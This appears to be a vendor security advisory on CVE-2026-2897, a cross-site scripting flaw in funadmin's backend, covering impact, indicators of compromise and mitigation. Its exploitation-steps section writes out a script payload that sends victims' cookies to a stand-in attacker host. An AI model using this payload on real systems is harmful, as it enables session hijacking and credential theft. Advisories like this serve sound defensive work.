CVE-2026-2897: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-2897 is a stored/reflected cross-site scripting (XSS) vulnerability in funadmin up to version 7.1.0-rc4. The flaw exists in the Backend Interface component, specifically in the file app/backend/view/index/index.html, where manipulation of the Value argument leads to improper neutralization of user-supplied input during web page generation. It affects all funadmin versions prior to 7.1.0, including release candidates rc1 through rc4. The vulnerability was published on February 22, 2026, and carries a CVSS v3.1 base score of 4.8 (Medium) (Red Hat CVE, Feedly). The vendor was contacted prior to disclosure but did not respond.

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting) with a secondary classification of CWE-94 (Improper Control of Generation of Code). An attacker with high privileges (e.g., an authenticated backend administrator) can manipulate the Value argument in the Backend Interface to inject malicious scripts that are rendered in the victim's browser. Exploitation requires user interaction — a victim must visit or interact with the crafted page — and the attack originates remotely over the network. A public proof-of-concept has been disclosed via GitHub (GitHub PoC).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session token theft, credential harvesting, content defacement, or unauthorized actions performed on behalf of the victim. The confidentiality and integrity impacts are rated low, with no direct availability impact. Because the vulnerability resides in the backend administrative interface, exploitation could facilitate privilege escalation or lateral movement if administrator session cookies are captured (Red Hat CVE, Feedly).

Exploitability

A public proof-of-concept exploit has been disclosed on GitHub as of February 24, 2026, though there is no current evidence of active in-the-wild exploitation (GitHub PoC). The EPSS score is approximately 0.03%, indicating a low probability of exploitation in the near term. The CVSSv4 exploit maturity is rated "Proof of Concept." No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Reconnaissance: Identify funadmin instances running versions up to 7.1.0-rc4 by examining exposed backend login pages or version indicators in HTTP responses.
  2. Authentication: Log in to the funadmin backend with high-privileged (administrator) credentials, either obtained through credential stuffing, phishing, or other means.
  3. Locate vulnerable parameter: Navigate to the Backend Interface component corresponding to app/backend/view/index/index.html and identify the Value input field.
  4. Inject XSS payload: Submit a crafted payload in the Value argument, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>, which is stored or reflected without proper sanitization.
  5. Trigger execution: Induce a victim (e.g., another administrator) to visit the affected page, causing the injected script to execute in their browser context.
  6. Harvest data: Collect session cookies, credentials, or other sensitive data exfiltrated to the attacker-controlled server, enabling session hijacking or further unauthorized actions (GitHub PoC).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains immediately after visiting the funadmin backend interface; unusual GET/POST requests containing encoded JavaScript or <script> tags in the Value parameter.
  • Logs: Web server access logs showing requests to app/backend/view/index/index.html with anomalous or encoded content in the Value field; error logs indicating unexpected script execution or content rendering issues.
  • File System: Unexpected modifications to app/backend/view/index/index.html or related template files if the XSS payload is stored server-side.
  • Process/Session: Unusual session activity such as simultaneous logins from different IP addresses for the same administrator account, suggesting session token theft.

Mitigation and workarounds

Upgrade funadmin to version 7.1.0 (stable release) or later, as all versions up to and including 7.1.0-rc4 are affected. Since the vendor has not responded to disclosure, no official patch advisory has been issued; upgrading to the stable 7.1.0 release is the primary recommended remediation (Red Hat CVE). As interim mitigations: implement strict input validation and output encoding for the Value argument in the Backend Interface; restrict backend access to trusted IP ranges using firewall rules or VPN; and deploy a Web Application Firewall (WAF) with XSS detection rules to block malicious payloads.

Community reactions

The vulnerability has been indexed by several security aggregators including VulDB, Vulners, CIRCL, and INCIBE-CERT, indicating routine community tracking. No notable researcher commentary or significant media coverage has been identified beyond standard CVE database entries. The vendor's lack of response to the initial disclosure has been noted in the public record (GitHub PoC).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management